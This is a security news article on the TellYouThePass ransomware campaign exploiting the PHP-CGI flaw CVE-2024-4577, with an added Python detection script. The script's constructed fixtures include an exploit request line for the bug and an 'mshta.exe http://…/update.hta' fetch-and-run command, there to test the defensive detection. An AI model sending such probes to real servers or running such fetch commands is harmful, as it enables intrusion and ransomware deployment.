Threat actors behind a recent ransomware campaign have been leveraging a new PHP vulnerability (CVE-2024-4577) in order to execute arbitrary PHP code on targeted systems.
The PHP Group last week fixed the argument injection vulnerability, which affects PHP running in CGI mode on Windows (or any deployment where the php-cgi.exe binary is reachable from the web server) and therefore every version of the XAMPP development environment installed on Windows, whose default Apache configuration routes requests to php-cgi.exe. The bug has been confirmed on Windows systems using certain code pages (Traditional Chinese, Simplified Chinese and Japanese locales), though other locales have not been ruled out; PHP loaded as an Apache module is not affected. Researchers initially said on June 7 that they had observed attackers scanning for the flaw. In a new analysis this week, however, the Imperva threat research team said the flaw was being leveraged in a campaign deploying ransomware called TellYouThePass.
“From as early as June 8th, we have detected attacker activity leveraging this vulnerability to deliver malware, which we have now identified to be a part of the 'TellYouThePass' ransomware campaign,” according to Gai Stapel and Daniel Johnson with Imperva in an analysis. “As we analyzed attacks exploiting this vulnerability, we noticed a few campaigns, including WebShell upload attempts and several attempts to place ransomware on a target system.”
The TellYouThePass ransomware has been around since at least 2019 and has previously leveraged vulnerabilities in Apache software, such as the Log4j flaw (Log4Shell) and the widely exploited bug in ActiveMQ (CVE-2023-46604). Security researchers have labeled TellYouThePass a commodity-level, "low sophistication" ransomware that has been used against both businesses and private individuals.
In these most recent attacks, the threat actors used the known exploit for the PHP bug to execute code on targeted systems. They then turned to living-off-the-land tactics: PHP's "system" function was used to launch mshta.exe, a native Windows binary that can fetch and run a remote HTML application (HTA) file, so the payload was pulled from attacker infrastructure rather than carried in the initial request. After execution, the sample sent a request to the C2 server with details about the infected machine. The binary then carried out basic ransomware functionality, generating encryption keys and encrypting files with predefined extensions within previously enumerated directories.
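The chain Imperva describes (argument injection into php-cgi.exe, then mshta.exe fetching an HTA) gives a defender two places to look. What follows is an added example written for this page, not tooling from Imperva's report or code from the PHP project: it walks constructed Sysmon-style process-creation records for living-off-the-land binaries descended from php-cgi.exe and for mshta.exe loading an HTA over HTTP(S), and it scans constructed Apache access-log lines for the option-injection shape (`%ADd`, the soft-hyphen encoding of `-d`) published in the public advisory for CVE-2024-4577, a detail this article itself does not spell out. The event field names, sample IP addresses and log lines are all assumptions.

```python
"""Detection for the chain described above: php-cgi.exe argument injection
followed by a living-off-the-land launch of mshta.exe.  Added example with
constructed data; not Imperva's tooling or PHP project code."""
import re
from urllib.parse import unquote_plus

# Constructed Sysmon-style process-creation records (not real telemetry).
PROCESS_EVENTS = [
    {"pid": 4412, "ppid": 3120, "image": r"C:\xampp\php\php-cgi.exe",
     "cmdline": "php-cgi.exe"},
    {"pid": 4588, "ppid": 4412, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c mshta.exe http://203.0.113.10/update.hta"},
    {"pid": 4602, "ppid": 4588, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/update.hta"},
    {"pid": 5100, "ppid": 900, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\tools\local.hta"},
]

# Constructed Apache access-log lines.  Line 0 carries the public probe shape
# for this bug: on affected Windows locales, best-fit character mapping turns
# 0xAD (soft hyphen) into '-' before php-cgi.exe parses its arguments, so
# "%ADd" becomes the "-d" option; '=' is sent encoded so the raw query string
# has no literal '=' and the web server hands it to the CGI binary as argv.
ACCESS_LOG = [
    '203.0.113.77 - - [08/Jun/2024:10:12:01 +0000] "POST /php-cgi/php-cgi.exe'
    '?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512',
    '198.51.100.5 - - [08/Jun/2024:10:12:05 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
    '198.51.100.9 - - [08/Jun/2024:10:12:09 +0000] "GET /search.php?q=-dash HTTP/1.1" 200 300',
]

PHP_CGI = "php-cgi.exe"
LOLBINS = {"cmd.exe", "powershell.exe", "mshta.exe", "certutil.exe", "rundll32.exe"}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# php-cgi options worth flagging when they show up as argv tokens.
OPTION_RE = re.compile(r"(?:^|\s)-[dsnc](?:\s|$)")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _ancestors(event, by_pid, max_depth=8):
    """Walk ppid links upward; stop at an unknown parent, a loop, or the depth limit."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen and len(seen) < max_depth:
        yield cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])


def find_suspicious_processes(events):
    """Return [(pid, reason)] for LOLBins descended from php-cgi.exe and for
    mshta.exe pulling an HTA over HTTP(S)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        name = _basename(ev["image"])
        reasons = []
        if name in LOLBINS and any(_basename(a["image"]) == PHP_CGI
                                   for a in _ancestors(ev, by_pid)):
            reasons.append("descendant of php-cgi.exe")
        if name == "mshta.exe" and re.search(r"https?://", ev["cmdline"], re.I):
            reasons.append("mshta.exe loading remote HTA")
        if reasons:
            hits.append((ev["pid"], "; ".join(reasons)))
    return hits


def decode_query(query: str) -> str:
    """Normalise a query string the way php-cgi.exe would see it on an
    affected Windows locale: %AD -> '-', then URL-decode with '+' as space."""
    return unquote_plus(re.sub(r"%ad", "-", query, flags=re.I))


def find_injection_attempts(log_lines):
    """Return [(index, decoded_query)] for requests whose query string, once
    decoded, carries a php-cgi command-line option."""
    hits = []
    for i, line in enumerate(log_lines):
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group("target"):
            continue
        decoded = decode_query(m.group("target").split("?", 1)[1])
        if OPTION_RE.search(decoded):
            hits.append((i, decoded))
    return hits


if __name__ == "__main__":
    for pid, why in find_suspicious_processes(PROCESS_EVENTS):
        print(f"process {pid}: {why}")
    for idx, q in find_injection_attempts(ACCESS_LOG):
        print(f"log line {idx}: {q}")
```

The process check is the more durable of the two: php-cgi.exe has no business spawning cmd.exe or mshta.exe on a web server, whatever the request looked like, and the local-HTA launch under an unrelated parent (pid 5100) is deliberately left unflagged to show the rule keys on lineage and remote fetch rather than on mshta.exe alone. The log check normalises before matching, so a WAF rule that only looks for the literal string `%AD` can be evaded by case or by double encoding, whereas decoding first catches those variants.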
“The ‘TellYouThePass’ ransomware campaign has been in operation since 2019 and has taken various forms over the years,” including samples written in Java, .Net and Golang, according to researchers. “Recently observed variants have taken the form of .NET samples delivered using HTML applications.”
Fixed releases (PHP 8.3.8, 8.2.20 and 8.1.29) were published on June 6, and organizations running vulnerable versions of PHP should update as soon as possible. Older branches (PHP 8.0 and earlier) are end-of-life and received no fix, so systems still on them need either an upgrade path or a configuration that stops the web server from invoking php-cgi.exe. In a separate advisory, the Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added CVE-2024-4577 to its Known Exploited Vulnerabilities catalog, noting it was "known to be used in ransomware campaigns," and gave federal agencies a due date of July 3 to patch the flaw.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” said CISA.